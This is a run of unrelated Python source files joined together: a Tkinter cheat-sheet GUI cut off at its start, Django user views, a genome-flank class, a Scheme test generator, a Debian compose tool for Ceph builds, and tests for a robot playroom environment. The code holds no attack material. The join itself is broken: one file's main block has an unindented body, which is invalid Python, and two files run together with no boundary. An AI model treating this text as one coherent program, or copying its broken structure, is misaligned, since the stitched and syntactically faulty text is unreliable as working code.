            self.place("navBtn" + str(i), (0, i*1/len(self.categories), 1, 1/len(self.categories) - 0.002))
        # Header frame
        self.addMenu("head", False, False, "head_s")
        self.place("head", (0, 0, 1, 0.15), True)
        self.addWidget("head", "titleMain", tk.Label, "titleMain_s", text="TKINTER CHEAT SHEET")
        self.place("titleMain", (0, 0, 1, 1))
        self.addWidget("head", "homeBtn", tk.Button, "homeBtn_s", image=self.images['home_icon'], command=lambda: self.goToArticle(0))
        self.place("homeBtn", (0.9, 0.2, 0.1, 0.6))
        # Default Main
        self.addMenu("article0", False, True, "article_s", scrollregion=(0,0,2000,800))
        self.place("article0", (0, 0.15, 0.8, 1), True)
        # Get the canvas dimensions
        self.root.update()
        self.can_w, self.can_h = self.menus["article0"].winfo_width(), self.menus["article0"].winfo_height()
        self.addWidget("article0", "article0img", tk.Label, image=self.images["article0"])
        self.menus["article0"].create_window(self.can_w/2, self.can_h/2.15, window=self.widgets["article0img"])
        # Mouse Wheel Event
        self.menus["article0"].bind_all("<MouseWheel>", self.onMousewheel)
        # Creating all the articles
        self.setupArticle1()
        self.setupArticle2()
        self.setupArticle3()
        self.goToMenu("article0")
    def onMousewheel(self, event):
        """Scroll the active article; Windows wheel deltas arrive in +/-120 steps."""
        self.current_menu.yview_scroll(int(-1*(event.delta/120)), "units")
    def goToArticle(self, i):
        """Switch to article *i*, rebuilding the scroll bar where needed."""
        self.current_article = i
        self.goToMenu("article" + str(i))
        # Articles 0 and 3 fit on one screen, so they get no scroll bar.
        no_scroll_articles = [0, 3]
        if not i in no_scroll_articles:
            self.resetScrollBar()
    def resetScrollBar(self):
        """Recreate the vertical scroll bar and wire it to the current article."""
        # Scroll Bar setup
        if "scrollbar" in self.widgets:
            self.widgets["scrollbar"].destroy()
        self.addWidget("article" + str(self.current_article), "scrollbar", tk.Scrollbar, orient="vertical", command=self.menus["article0"].yview)
        self.place("scrollbar", (0.973, 0, 0.025, 1*0.85))
        self.current_menu.config(yscrollcommand=self.widgets["scrollbar"].set)
        self.current_menu.bind_all("<MouseWheel>", self.onMousewheel)
        self.widgets["scrollbar"].config(command=self.current_menu.yview)
    def runExampleSeeCode(self, func, name):
        """Open a popup showing code-example image *name*; clicking the
        button region in the top-right corner runs *func*."""
        # Setting up window
        top = tk.Toplevel(self.root)
        top.geometry("800x550")
        top.title("Code Example")
        top.resizable(False, False)
        top.iconbitmap("assets/icons/icon.ico")
        # Adding widgets to the window
        background = tk.Label(top, image=self.images["ex_background1"])
        background.place(relx=0, rely=0, relwidth=1, relheight=1)
        code = tk.Label(top, image=self.images[name], bg="#37474f")
        code.place(relx=0, rely=0.2, relwidth=1, relheight=0.8)
        top.bind("<Button-1>", lambda x: self.callfuncbtn(x, (690, 10, 780, 70), func))
    def callfuncbtn(self, event, rect, func):
        """Run *func* if the click in *event* lands inside *rect* (x1,y1,x2,y2)."""
        if event.x > rect[0] and event.x < rect[2] and event.y > rect[1] and event.y < rect[3]:
            # NOTE(review): eval of a string callback -- safe only because all
            # call sites pass internal literals, never user input.
            if isinstance(func, str):
                eval(func + "()")
            else:
                func()
    def get_attributes(self, widget):
        """Open a popup listing every Tk option of *widget* (value + type),
        then destroy the probe widget."""
        widg = widget
        keys = widg.keys()
        properties = {}
        for key in keys:
            value = widg[key] if widg[key] else 'N/A'
            vtype = str(type(value))
            # Formatting the type
            vtype = vtype.replace("<class '", "").replace("'>", "")
            vtype = vtype.replace("_tkinter.Tcl_Obj", "TCL Object").replace("tkinter.Menu", "Menu").replace("int", "Integer").replace("str", "String")
            properties.update({key: [value, vtype]})
        # Creating properties window
        top = tk.Toplevel(self.root)
        top.geometry("800x550")
        top.title("Widget Properties")
        top.resizable(False, False)
        top.iconbitmap("assets/icons/icon.ico")
        # Adding header
        head = tk.Label(top, text="This is the title lolz")
        head.place(relx=0, rely=0, relwidth=1, relheight=0.2)
        # Adding listbox
        maxheight = 50*len(properties.keys()) + 450
        canv = tk.Canvas(top, scrollregion=(0, 0, 800, maxheight))
        canv.place(relx=0, rely=0, relwidth=1, relheight=1)
        sb = tk.Scrollbar(top, orient="vertical")
        sb.pack(side="right", fill="y")
        canv.config(yscrollcommand=sb.set)
        sb.config(command=canv.yview)
        canv.create_image((400, 2500), image=self.images["prop_win_main"])
        # One image row + three text items per widget option.
        for i ,key in enumerate(properties.keys()):
            canv.create_image((400, 190+i*55), image=self.images["prop_win_prop"])
            canv.create_text(85, 190+i*55, text=key, font="Verdana 10",anchor="w", fill="#299200")
            canv.create_text(505, 190+i*55, text=properties[key][1], font="Verdana 8",anchor="e", fill="#0c7cba")
            canv.create_text(550, 190+i*55, text=properties[key][0], font="Verdana 8",anchor="w", fill="#0c7cba")
        canv.create_text(350, 65, text=widget.winfo_class(), anchor="w", font="Verdana 20 bold", fill="#19967d")
        widget.destroy()
    def setupArticle1(self):
        """Article 1 (events list): scrollable image with two try-it buttons."""
        self.addMenu("article1", False, True, "article_s", scrollregion=(0,0,1000,6000))
        self.place("article1", (0, 0.15, 0.8, 1), True)
        self.addWidget("article1", "article1img", tk.Label, image=self.images["article1"])
        self.menus["article1"].create_window(self.can_w/2, self.can_h*3.6, window=self.widgets["article1img"])
        self.addWidget("article1", "trybtn1-1", tk.Button, "try_it_btn_s", command = exs.one_1)
        self.menus["article1"].create_window(118, 800, window=self.widgets["trybtn1-1"])
        self.addWidget("article1", "trybtn1-2", tk.Button, "try_it_btn_s", command = exs.one_2)
        self.menus["article1"].create_window(118, 5628, window=self.widgets["trybtn1-2"])
    def setupArticle2(self):
        """Article 2 (widget list): image plus one see-example button per
        widget, anchored at hand-tuned pixel offsets."""
        self.addMenu("article2", False, True, "article_s", scrollregion=(0,0,1000,4150))
        self.place("article2", (0, 0.15, 0.8, 1), True)
        self.addWidget("article2", "article2img", tk.Label, image=self.images["article2"])
        self.menus["article2"].create_window(self.can_w/2, self.can_h*2.5, window=self.widgets["article2img"])
        btn_positions = [1495, 1590, 1685, 2040, 2130, 2220, 2590, 2675, 2765, 2900, 3030, 3120, 3205, 3335, 3570, 3660, 3790, 3920]
        for i, pos in enumerate(btn_positions):
            self.addWidget("article2", "trybtn2-" + str(i+1), tk.Button, image=self.images["seeExBtn"], highlightthickness=0, bd=0, command=lambda x=i: self.runExampleSeeCode("exs.two_{}".format(x+1), "2_{}".format(x+1)))
            self.menus["article2"].create_window(1000, pos, window=self.widgets["trybtn2-" + str(i+1)])
    def setupArticle3(self):
        """Article 3 (widget properties): static image acting as a click grid."""
        self.addMenu("article3", False, True, "article_s", scrollregion=(0,0,1000,800))
        self.place("article3", (0, 0.15, 0.8, 1), True)
        self.addWidget("article3", "article3img", tk.Label, image=self.images["article3"])
        self.menus["article3"].create_window(self.can_w/2, self.can_h/2.35, window=self.widgets["article3img"])
        self.widgets["article3img"].bind("<Button-1>", self.buttonGridCallBack)
    def buttonGridCallBack(self, event):
        """Map a click on the article-3 image onto the widget grid (two
        columns of nine 412x45 px cells) and show that widget's properties."""
        init_y = 241
        hz = [178, 665]
        w, h = 412, 45
        widgets = [[tk.Frame, tk.LabelFrame, tk.Canvas, tk.Label, tk.Message, tk.Text, tk.Button, tk.Entry, tk.Listbox], [tk.Menubutton, "OptionMenu", tk.Checkbutton, tk.Radiobutton, tk.Spinbox, "Tk", tk.Menu, tk.Toplevel, tk.PanedWindow]]
        for i in range(2):
            for j in range(9):
                if event.x > hz[i] and event.x < hz[i] + w and event.y > init_y + h*j and event.y < init_y + h*(j+1):
                    # Handling some problematic cases
                    if widgets[i][j] == "Tk":
                        tkinter.messagebox.showinfo("Widget Properties", "The Tk widget does not have any properties !\nIts attributes are set using methods such as geometry or title.\n To learn more about those, read the 'Tkinter Functions' part.")
                    elif widgets[i][j] == "OptionMenu":
                        v = tk.StringVar(self.root)
                        self.get_attributes(tk.OptionMenu(self.root, v, "0", "1", "2"))
                    else:
                        self.get_attributes(widgets[i][j](self.root))
def openCheatSheet():
    """Instantiate the cheat-sheet application and enter the Tk event loop."""
    app = CheatSheet("Tkinter Cheat Sheet", (1400, 800))
    app.root.mainloop()
def loadStyleSheet(path, separate_tags):
    """Parse a CSS-like style sheet file.

    The file consists of ``name { prop: value; ... }`` entries.  Property
    names starting with ``t__`` are "tags" and, when *separate_tags* is
    true, are collected separately with the prefix removed.

    Returns the style dict (name -> {prop: value}), or the tuple
    ``(style_dict, tags_dict)`` when *separate_tags* is true.  A
    ``"__none__"`` entry with no properties is always present.
    """
    style_sheet = {}
    tags_dict = {}
    # Opening file
    with open(path, "r") as css_file:
        file_string = css_file.read()
    file_string = file_string.replace("\n", "")
    # Treat '}' like '{' so split() alternates name / property segments.
    file_string = file_string.replace("}", "{")
    # Getting all the css class names and properties as array elements
    file_array = file_string.split("{")
    for k in range(len(file_array) // 2):
        # Getting the css class name
        name = file_array[2 * k].strip(" ")
        # Formatting the properties into a dictionnary
        properties = file_array[2 * k + 1].split(";")
        prop_dict = {}
        # Looping through all the properties of the class
        for property_ in properties:
            if property_.strip(" ") == "":
                continue
            # Getting and formatting the name and value
            property_name, property_val = property_.split(":")
            property_name = property_name.strip(" ")
            property_val = property_val.strip(" ")
            # Updating the class dictionary
            if property_name.startswith("t__") and separate_tags:
                # BUG FIX: strip("t__") removed *any* leading/trailing 't'/'_'
                # characters (e.g. "t__title" -> "itle"); drop only the prefix.
                tags_dict.update({property_name[len("t__"):]: property_val})
            else:
                prop_dict.update({property_name: property_val})
        style_sheet.update({name: prop_dict})
    # Adding null value to the style sheet
    style_sheet.update({"__none__": {}})
    # BUG FIX: the old "return a if cond else a, b" parsed as "(a), b" and
    # therefore *always* returned a tuple, breaking separate_tags=False
    # callers.
    if separate_tags:
        return style_sheet, tags_dict
    return style_sheet
def helloworld():
    """Emit the canonical greeting on stdout (smoke-test helper)."""
    greeting = "hello world"
    print(greeting)
if __name__ == "__main__":
openCheatSheet()
|
# Public sub-modules for ``from <package> import *``.
__all__ = ['utilities']
# Re-export the convenience helpers at package level.
from .utilities import set_credentials, set_destination, notify_when_done
|
from django.shortcuts import render, redirect
from django.contrib.auth import login, authenticate, logout
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.contrib.auth.models import User
from posts.forms import PostForm
from posts.models import Post, Follow
from .models import Profile, Gender
from .forms import CustomUserCreationForm, ProfileForm
from .email import send_welcome_email
# Create your views here.
def loginUser(request):
    """Authenticate a visitor and start a session.

    GET renders the login page; POST validates the submitted
    username/password pair.  Already-authenticated users are redirected
    straight to the explore page.
    """
    if request.user.is_authenticated:
        return redirect('explore')
    if request.method == 'POST':
        username = request.POST['username']
        password = request.POST['password']
        try:
            User.objects.get(username=username)
        except User.DoesNotExist:
            # BUG FIX: the original bare ``except:`` also swallowed unrelated
            # errors (database failures, KeyboardInterrupt); catch only the
            # expected lookup miss.
            messages.error(request, 'Username does not exist')
        # authenticate() returns None for a wrong password *or* an unknown
        # username, so the branch below covers both cases.
        user = authenticate(request, username=username, password=password)
        if user is not None:
            login(request, user)
            return redirect('explore')
        else:
            messages.error(request, 'Username or password is incorrect')
    context = {'page': 'login'}
    return render(request, 'users/login_register.html', context)
def logoutUser(request):
    """End the current session and send the visitor to the login page."""
    logout(request)
    messages.info(request, 'User was logged out!')
    return redirect('login')
def registerUser(request):
    """Create a new account, send a welcome e-mail and log the user in."""
    form = CustomUserCreationForm()
    if request.method == 'POST':
        # NOTE(review): read before form validation -- a POST missing these
        # keys raises MultiValueDictKeyError; confirm the template always
        # submits them.
        name = request.POST['first_name']
        email = request.POST['email']
        form = CustomUserCreationForm(request.POST)
        if form.is_valid():
            user = form.save(commit=False)
            # Normalise the username so lookups are case-insensitive.
            user.username = user.username.lower()
            user.save()
            messages.success(request, 'User account was created')
            send_welcome_email(name, email)
            login(request, user)
            return redirect('edit-profile')
        else:
            messages.error(
                request, 'An error has occured during registration!')
    return render(request, 'users/login_register.html')
@login_required(login_url='login')
def userProfile(request, pk):
    """Render the profile page for user *pk*, including follow statistics."""
    user = User.objects.get(id=pk)
    profile = user.profile
    # 1 when the signed-in user already follows this profile, else 0.
    status = Follow.objects.filter(followee=profile.user, follower=request.user).count()
    context = {
        'profile': profile,
        'uploadForm': PostForm(),
        # NOTE(review): filters by request.user, so the page always shows the
        # *viewer's* posts even on someone else's profile -- confirm intended
        # (user=user would show the profile owner's posts instead).
        'posts': Post.objects.filter(user=request.user),
        'status':status,
        'followee_followers_count': Follow.objects.filter(followee=user).count(),
        'followee_following_count': Follow.objects.filter(follower=user).count(),
        'user_followers_count': Follow.objects.filter(followee=request.user).count(),
        'user_following_count': Follow.objects.filter(follower=request.user).count(),
    }
    return render(request, 'users/profile.html', context)
@login_required(login_url='login')
def editProfile(request):
    """Show and process the form for editing the signed-in user's profile."""
    profile = request.user.profile
    if request.method == 'POST':
        # Bound form: re-rendered with errors when invalid.
        form = ProfileForm(request.POST, request.FILES, instance=profile)
        if form.is_valid():
            form.save()
            return redirect('profile', request.user.id)
    else:
        form = ProfileForm(instance=profile)
    context = {
        'form': form,
        'profile': profile,
        'uploadForm': PostForm(),
    }
    return render(request, 'users/profile_form.html', context)
|
# flank.py
#
# Author: Jan Piotr Buchmann <jan.buchmann@sydney.edu.au>
# Description:
#
# Version: 0.0
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '../'))
import lib.sequence.sequence
import extensions.extension
class BlastData:
    """Mutable record of a BLAST hit: coordinates plus strand orientation."""

    def __init__(self):
        # Defaults describe an empty hit on the plus strand.
        self.start = 0
        self.stop = 0
        self.strand = "Plus"

    def update(self, start, stop, strand):
        """Overwrite the stored hit, coercing coordinates to int."""
        self.start, self.stop = int(start), int(stop)
        self.strand = strand
class Flank:
    """Abstract description of one flank (end) of a contig.

    Concrete subclasses must implement is_extended(),
    get_fasta_sequence() and calculate_coordinates().
    """
    def __init__(self, ctg, side):
        self.contig = ctg
        self.length = ctg.flank_len
        self.side = side
        self.name = "{}_{}".format(self.contig.name, self.side)
        self.start = 0
        self.stop = 0
        self.ref_overlap = 5
        self.qry_overlap = 20
        self.shift = 0
        self.extension = extensions.extension.Extension(self)
        # Subclasses derive start/stop from self.contig here.
        self.calculate_coordinates()
        self.blast_data = BlastData()
    def has_extension(self):
        """Return True when an extension sequence has been attached."""
        if self.extension.length == 0:
            return False
        return True
    def is_extended(self, alignment):
        """Abstract: decide whether *alignment* extends this flank."""
        # BUG FIX: the message referred to a non-existent check_overlap().
        raise NotImplementedError("Require is_extended() implementation")
    def get_fasta_sequence(self):
        """Abstract: return the flank sequence in FASTA form."""
        raise NotImplementedError("Require get_fasta_sequence() implementation")
    def calculate_coordinates(self):
        """Abstract: compute start/stop from self.contig.

        BUG FIX: the base signature declared a ``contig`` parameter although
        __init__ invokes the method with no arguments, so any subclass must
        implement the zero-argument form; the base now matches its call site.
        """
        raise NotImplementedError("Require calculate_coordinates() implementation")
    def show(self):
        """Print a tab-separated summary of this flank's coordinates."""
        print("\t{}\t{} :\t{}\t{}\t{}\t{}".format(self.side,
                                                  self.name,
                                                  self.start,
                                                  self.stop,
                                                  self.length,
                                                  self.shift))
|
class Subtraction:
    """Namespace for elementary subtraction helpers."""

    @staticmethod
    def difference(minuend, subtraend):
        """Return *minuend* minus *subtraend*."""
        result = minuend - subtraend
        return result
from scheme_runner import Query, SchemeTestCase
def balanced(code):
    """Return True when the lines in *code* contain as many '(' as ')'."""
    opens = sum(line.count("(") for line in code)
    closes = sum(line.count(")") for line in code)
    return opens == closes
def decode(filename: str):
    """Translate an annotated ``.scm`` file into generated pytest modules.

    Input format: ``;;; group>NAME`` opens a test group; ``; expect ...``
    comments record expected output for the preceding query; any other
    non-comment line is scheme code (lines are folded into the previous
    query until its parentheses balance).  One file
    ``scm_tests/case_<name>.py`` is written per group.
    """
    if not filename.endswith(".scm"):
        filename += ".scm"
    with open(filename) as f:
        contents = str(f.read())
    groups = {}
    # NOTE(review): a code line appearing before any ';;; group>' header hits
    # ``curr_case`` while it is still None (AttributeError) -- confirm inputs
    # always start with a group header.
    curr_case = None
    for line in contents.split("\n"):
        line = line.strip()
        if not line:
            continue
        elif line.startswith(";;; group>"):
            curr_case = SchemeTestCase([])
            groups[line.split("group>", 1)[1]] = curr_case
        elif line.startswith(";"):
            if not line.startswith("; expect"):
                continue # useless comments
            # Append the expected text (split on ';' for multi-value
            # expectations) onto the last query's "out" entry.
            expect_str = line.split("; expect")[1]
            curr_case.queries[-1].expected["out"] = \
                [curr_case.queries[-1].expected.get("out", [""])[0]
                 + "".join(x.strip() + "\n" for x in expect_str.split(";"))]
        elif curr_case.queries and not balanced(curr_case.queries[-1].code):
            # Unbalanced parens: this line continues the previous query.
            curr_case.queries[-1].code.append(line)
        else:
            curr_case.queries.append(Query([line], {}))
    print(groups)
    for group in groups:
        filename = f"scm_tests/case_{group.strip().lower().replace(' ', '-')}.py"
        # Truncate the output file, then append line by line via write().
        with open(filename, "w") as f:
            f.write("")
        def write(x):
            print(x)
            with open(filename, "a") as f:
                f.write(x + "\n")
        write("from scheme_runner import SchemeTestCase, Query")
        write("cases = [")
        write(repr(groups[group]))
        write("]")
if __name__ == '__main__':
    # Interactive entry point: prompt for a .scm filename and convert it.
    # stdout mirrors everything written to the generated case files.
    print("# stdout is a viable test file")
    decode(input("# input filename: "))
|
import errno
import glob
import os
from rhcephcompose import Comps, Variants
from rhcephcompose import gather
from rhcephcompose import metadata
from rhcephcompose.gather import chacra
from rhcephcompose.gather import koji
from rhcephcompose.log import log
from shutil import copy
import subprocess
import textwrap
import time
# Suffix appended after the date in a compose ID for each compose type
# (e.g. "20160922.n.0" for a nightly). Production composes get no suffix.
COMPOSE_TYPE_MAP = {
    'production': '',
    'nightly': '.n',
    'test': '.t',
    'ci': '.ci',
}
class Compose(object):
    """
    A "compose" is a particular "spin" or "release" . It is a collection
    of repositories.
    """
    def __init__(self, conf):
        """ This constructor simply stores all our settings; it takes no
        actions. See run() for that. """
        # Build lists are normally in the Errata Tool or a Brew tag. There's
        # no support for Ubuntu builds in Brew or the Errata Tool today, so I
        # just list each build in text files. The "builds" dict here contains
        # a text file for each distro.
        self.builds = conf['builds']
        # In Pungi terminology, assume gather_source "comps" (see also
        # Pungi's "comps_file".)
        self.comps = conf['comps']
        # Variants file copied directly from what we use with Pungi on
        # RHEL.
        self.variants_file = conf['variants_file']
        # Set koji_profile or chacra_url.
        self.koji_profile = conf.get('koji_profile')
        self.chacra_url = conf.get('chacra_url')
        self.chacra_ssl_verify = conf.get('chacra_ssl_verify', True)
        # Lookaside cache location.
        # See freedesktop.org spec for XDG_CACHE_HOME
        try:
            xdg_cache_home = os.environ['XDG_CACHE_HOME']
        except KeyError:
            xdg_cache_home = os.path.expanduser('~/.cache')
        self.cache_path = os.path.join(xdg_cache_home, 'rhcephcompose')
        # Output target directory
        self.target = conf['target']
        # Short name, eg "RHCEPH"
        self.release_short = conf['release_short']
        # Release version, eg "1.3"
        try:
            self.release_version = conf['release_version']
        except KeyError:
            # backwards compatibility option for old configurations
            self.release_version = conf['product_version']
        # Extra files to put at the root of the compose
        self.extra_files = conf['extra_files']
        # Whether sources composition should be included or skipped
        self.include_sources = conf.get('include_sources', True)
        # Compose type for output directory name
        self.compose_type = conf.get('compose_type', 'test')
        # Whether -dbg composition should be included or skipped
        self.include_dbg = conf.get('include_dbg', True)
        self.date = time.strftime('%Y%m%d', time.gmtime())
        # We only support one arch: x86_64.
        self.arch = 'x86_64'
        # Respin is computed from the directories already in self.target.
        self.respin = self._find_respin()
    def validate(self):
        """
        Sanity-check that files exist before we go to the work of running.
        """
        if not self.koji_profile:
            if self.chacra_url is None:
                raise RuntimeError('Set koji_profile or chacra_url')
        self.validate_builds_lists()
        # comps XML
        for comps_file in self.comps.values():
            if not os.access(comps_file, os.R_OK):
                raise RuntimeError('Unreadable comps file %s' % comps_file)
        # variants XML
        if not os.access(self.variants_file, os.R_OK):
            raise RuntimeError('Unreadable variants file %s' %
                               self.variants_file)
        # extra_files
        for extra_file in self.extra_files:
            # For "file" type extra files, we expect it in the user's cwd.
            if 'file' in extra_file:
                src = os.path.join('extra_files', extra_file['file'])
                if not os.access(src, os.R_OK):
                    raise RuntimeError('Unreadable extra file %s' % src)
    def validate_builds_lists(self):
        """Check every builds file is readable and that no build NVR in one
        distro's list mentions another configured distro's name."""
        if len(self.builds) < 1:
            raise RuntimeError('No builds files in config')
        distros = self.builds.keys()
        for distro, filename in self.builds.items():
            if not os.access(filename, os.R_OK):
                raise RuntimeError('Unreadable builds file %s' % filename)
            # Sanity-check the build NVRs for any mention of other_distros.
            with open(filename, 'r') as builds_fh:
                build_ids = [line.rstrip('\n') for line in builds_fh]
            other_distros = [d for d in distros if d != distro]
            for build_id in build_ids:
                for bad_distro in other_distros:
                    if bad_distro in build_id:
                        msg = '%s build %s in file %s' % (bad_distro, build_id,
                                                          filename)
                        raise RuntimeError(msg)
    def _generate_id(self, respin):
        """
        Generate a compose ID for this respin.
        :param int respin: a respin number for this compose
        :returns: a compose ID
        """
        compose_type = COMPOSE_TYPE_MAP[self.compose_type]
        name_tmpl = '{release_short}-{release_version}-{oslabel}-{arch}-{date}{compose_type}.{respin}' # NOQA
        return name_tmpl.format(release_short=self.release_short,
                                release_version=self.release_version,
                                oslabel='Ubuntu',
                                date=self.date,
                                arch=self.arch,
                                compose_type=compose_type,
                                respin=respin)
    def _find_respin(self):
        """
        Find the next available respin number in self.target.
        Use the same logic that pungi/compose.py uses in order come up with
        the name for the output directory. The name should be something
        like "Ceph-1.3-Ubuntu-20160922.t.0-x86_64" to match what
        Pungi creates.
        """
        respin = 0
        while self._compose_id_dir_exists(respin):
            respin += 1
        return respin
    def _compose_id_dir_exists(self, respin):
        """
        Return True if a compose ID directory exists for this respin.
        :param int respin: respin number for generating an ID
        :returns: True if the directory exists, or False if it does not exist
        """
        compose_id = self._generate_id(respin)
        directory = os.path.join(self.target, compose_id)
        if os.path.isdir(directory):
            log.info('Found prior compose dir: %s' % directory)
            return True
        return False
    @property
    def id(self):
        """Compose ID for this compose's (already-determined) respin."""
        return self._generate_id(self.respin)
    @property
    def output_dir(self):
        """Full path of this compose's top-level output directory."""
        return os.path.join(self.target, self.id)
    def run(self):
        """ High-level function to execute a compose. """
        self.validate()
        if not os.path.isdir(self.cache_path):
            os.makedirs(self.cache_path)
        if not os.path.isdir(self.target):
            os.makedirs(self.target)
        # Make top-level output directory for this compose.
        os.mkdir(self.output_dir)
        # Top-level "dbg" directory, parallel to our output_dir.
        if self.include_dbg:
            dbg_dir = self.output_dir + '-dbg'
            os.mkdir(dbg_dir)
        # Top-level "sources" directory, parallel to our output_dir.
        if self.include_sources:
            sources_dir = self.output_dir + '-sources'
            os.mkdir(sources_dir)
        build_metadata = {}
        # Run the steps for each distro.
        for distro in self.builds.keys():
            # (We assume that all keys in self.builds also exist in
            # self.comps.)
            if distro not in self.comps.keys():
                msg = ('Loading builds for "{0}", and the comps '
                       'configuration is missing a "{0}" key. Please add a '
                       'comps XML file for this distro.').format(distro)
                raise SystemExit(msg)
            build_metadata[distro] = self.run_distro(distro)
        # Copy any extra files to the root of the compose.
        for extra_file in self.extra_files:
            # For "glob" type extra files, glob the compose's output_dir, and
            # copy the results to the root.
            if 'glob' in extra_file:
                glob_path = os.path.join(self.output_dir, extra_file['glob'])
                for f in glob.glob(glob_path):
                    copy(f, self.output_dir)
            # For "file" type extra files, copy the file from the user's cwd.
            if 'file' in extra_file:
                copy(os.path.join('extra_files', extra_file['file']),
                     self.output_dir)
        # write compose metadata
        metadata.write(self, build_metadata)
        # create "latest" symlink
        self.symlink_latest()
    @property
    def latest_name(self):
        """Name of the "latest" symlink, e.g. "RHCEPH-1-Ubuntu-x86_64-latest".

        Uses only the major release version, so all point releases of a
        major version share one symlink.
        """
        tmpl = '{release_short}-{major_version}-{oslabel}-{arch}-latest'
        major_version = self.release_version.rsplit('.', 1)[0]
        return tmpl.format(
            release_short=self.release_short,
            major_version=major_version,
            oslabel='Ubuntu',
            arch=self.arch,
        )
    def symlink_latest(self):
        """ Create the "latest" symlink for this output_dir. """
        latest_path = os.path.join(self.target, self.latest_name)
        # Remove a stale symlink first; a missing one (ENOENT) is fine.
        try:
            os.unlink(latest_path)
        except OSError as e:
            if e.errno != errno.ENOENT:
                log.error('Problem deleting "latest" symlink')
                raise SystemExit(e)
        os.symlink(os.path.relpath(self.output_dir, start=self.target),
                   latest_path)
    def run_distro(self, distro):
        """
        Execute a compose for a distro.
        :returns: list of builds for this distro.
        """
        # Read pkg mappings from Pungi-style comps XML.
        # (Assembles a master list of package names that we will need.)
        comps_file = self.comps[distro]
        comps = Comps()
        comps.parse_file(comps_file)
        # Query chacra for our list of builds.
        if self.koji_profile:
            tag = self.builds[distro]
            builds = koji.query(profile=self.koji_profile,
                                tag=tag,
                                whitelist=comps.all_packages)
        else:
            builds_file = self.builds[distro]  # builds .txt for this distro
            builds = chacra.query(builds_file=builds_file,
                                  chacra_url=self.chacra_url,
                                  whitelist=comps.all_packages,
                                  ssl_verify=self.chacra_ssl_verify)
        # Cache all our builds into self.cache_dir.
        gather.cache(builds=builds,
                     cache_dir=self.cache_path,
                     ssl_verify=self.chacra_ssl_verify)
        # Assign the builds' files to the correct groups, according to
        # comps.xml + variants.xml.
        dbg_binaries = set()
        for build in builds:
            # Assign each binary to its respective comps group(s).
            for binary in build.binaries:
                comps.assign_binary_to_groups(binary)
                # And track all dbg binaries.
                if comps.is_present(binary.dbg_parent):
                    dbg_binaries.add(binary)
            # Download all the source artifacts for this build and put them in
            # the "sources" directory.
            if self.include_sources:
                # Top-level "sources" directory, parallel to our output_dir.
                sources_dir = self.output_dir + '-sources'
                for source in build.sources:
                    # We've already downloaded to cache_path earlier, so this
                    # is just a copy operation now:
                    source.download(cache_dir=self.cache_path,
                                    dest_dir=sources_dir)
        variants = Variants()
        variants.parse_file(self.variants_file)
        # Create a repository for each variant.
        for variant_id, groups in variants.items():
            repo_path = os.path.join(self.output_dir, variant_id)
            binaries = set()
            for group_id in groups:
                to_add = comps.groups[group_id].binaries
                log.info('Adding %d binaries from comps ID %s to variant %s' %
                         (len(to_add), group_id, variant_id))
                binaries.update(to_add)
            self.create_repo(repo_path, distro, binaries)
        # Create dbg repository.
        if self.include_dbg:
            dbg_path = self.output_dir + '-dbg'
            self.create_repo(dbg_path, distro, dbg_binaries)
        return builds
    def create_repo(self, repo_path, distro, binaries):
        """ Create a repository at repo_path. """
        # Top-level directory for this (variant) repository:
        if not os.path.isdir(repo_path):
            os.mkdir(repo_path)
        # Set up the reprepro configuration:
        log.info('Creating reprepro configuration for %s' % repo_path)
        conf_dir = os.path.join(repo_path, 'conf')
        if not os.path.isdir(conf_dir):
            os.mkdir(conf_dir)
        distributions_path = os.path.join(conf_dir, 'distributions')
        dist_template = textwrap.dedent('''\
            Codename: {codename}
            Suite: stable
            Components: main
            Architectures: amd64 i386
            Origin: Red Hat, Inc.
            Description: Ceph distributed file system
            DebIndices: Packages Release . .gz .bz2
            DscIndices: Sources Release .gz .bz2
            Contents: .gz .bz2
            ''')
        # Appended (not overwritten) so one repo can serve several distros.
        with open(distributions_path, 'a') as dist_conf_file:
            dist_conf_file.write(dist_template.format(codename=distro))
        for binary in binaries:
            # Add this binary to our variant's repo/directory:
            self.add_binary_to_repo(binary=binary,
                                    repo_path=repo_path,
                                    distro=distro)
    def add_binary_to_repo(self, binary, repo_path, distro):
        """ Add a binary (.deb) to a Debian repository. """
        msg = 'Running reprepro to add %s to %s distro in %s'
        log.info(msg % (binary.name, distro, repo_path))
        binary_path = os.path.join(self.cache_path, binary.filename)
        command = [
            'reprepro',
            '--ask-passphrase',
            '-b', repo_path,
            '-C', 'main',
            '--ignore=wrongdistribution',
            '--ignore=wrongversion',
            '--ignore=undefinedtarget',
            'includedeb', distro, binary_path
        ]
        log.info('running command: %s' % ' '.join(command))
        proc = subprocess.Popen(
            command,
            stdout=subprocess.PIPE
        )
        out, err = proc.communicate()
        exit_code = proc.wait()
        # NOTE(review): stderr is not redirected above (no stderr=PIPE), so
        # communicate() always returns err=None and this branch never runs.
        # If stderr were captured, iterating a bytes object here would also
        # log one byte at a time — confirm intent and fix together.
        if err:
            for i in err:
                log.error(i)
        if exit_code != 0:
            msg = 'command failed with status code: %s'
            raise RuntimeError(msg % exit_code)
|
"""Test cases for the boring room vs playroom environment."""
import numpy as np
import pytest
from predicators.src import utils
from predicators.src.envs.playroom import PlayroomEnv
from predicators.src.structs import Action
def test_playroom():
    """Tests for PlayroomEnv class properties."""
    utils.reset_config({"env": "playroom"})
    env = PlayroomEnv()
    # Every object's feature vector must line up with its type's features.
    for task_set in (env.get_train_tasks(), env.get_test_tasks()):
        for task in task_set:
            for obj in task.init:
                assert len(obj.type.feature_names) == len(task.init[obj])
    assert len(env.predicates) == 19
    expected_goal_names = {"On", "OnTable", "LightOn", "LightOff"}
    assert {pred.name for pred in env.goal_predicates} == expected_goal_names
    assert len(env.options) == 10
    assert len(env.types) == 5
    # Action space: 5-D box whose x/y bounds come from the class constants.
    assert env.action_space.shape == (5, )
    low = env.action_space.low
    high = env.action_space.high
    assert abs(low[0] - PlayroomEnv.x_lb) < 1e-3
    assert abs(high[0] - PlayroomEnv.x_ub) < 1e-3
    assert abs(low[1] - PlayroomEnv.y_lb) < 1e-3
    assert abs(high[1] - PlayroomEnv.y_ub) < 1e-3
    assert abs(low[2]) < 1e-3
    assert abs(high[2] - 10) < 1e-3
    assert abs(low[3] + 1) < 1e-3
    assert abs(high[3] - 1) < 1e-3
def test_playroom_failure_cases():
    """Tests for the cases where simulate() is a no-op."""
    utils.reset_config({"env": "playroom"})
    env = PlayroomEnv()
    On = [o for o in env.predicates if o.name == "On"][0]
    OnTable = [o for o in env.predicates if o.name == "OnTable"][0]
